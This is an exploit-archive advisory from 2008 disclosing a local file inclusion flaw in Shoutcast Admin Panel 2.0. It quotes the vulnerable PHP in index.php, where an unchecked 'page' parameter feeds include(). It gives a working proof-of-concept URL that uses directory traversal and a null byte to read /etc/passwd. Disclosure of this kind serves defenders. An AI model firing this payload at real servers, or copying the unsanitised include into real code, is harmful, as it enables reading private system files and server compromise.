[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Shoutcast Admin Panel 2.0 (page) Local File Inclusion Vulnerability
# Published : 2008-06-14
# Author : CWH Underground
# Previous Title : PHPMyCart (shop.php cat) Remote SQL Injection Vulnerability
# Next Title : Cartweaver 3 (prodId) Remote Blind SQL Injection Exploit
============================================================
Shoutcast Admin Panel 2.0 Local File Inclusion Vulnerability
============================================================
,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / ` /
/ XXXXXX /______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'
AUTHOR : CWH Underground
DATE : 14 June 2008
SITE : www.citec.us
#####################################################
APPLICATION : WallCity-Server: Shoutcast Admin Panel
VERSION : 2.0
DOWNLOAD : http://downloads.sourceforge.net/shoutcastadmin
#####################################################
---LFI---
-------------------------
Vulnerable in index.php
-------------------------
@Line
79: if (isset($_GET['page']))
80: $page = $_GET['page'];
81: else
82: $page = "main";
.
.
.
204: <?PHP if(!include("pages/".$page.".php"))
205: {
206: table("Achtung!");
207: echo "Die Seite existiert nicht!";
208: closetable();
209: }
210: ?>
-------------
POC Exploit
-------------
[+] http://192.168.24.25/wallcity/index.php?page=../../../../../../etc/passwd%00
##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos #
##################################################################
# www.Syue.com [2008-06-14]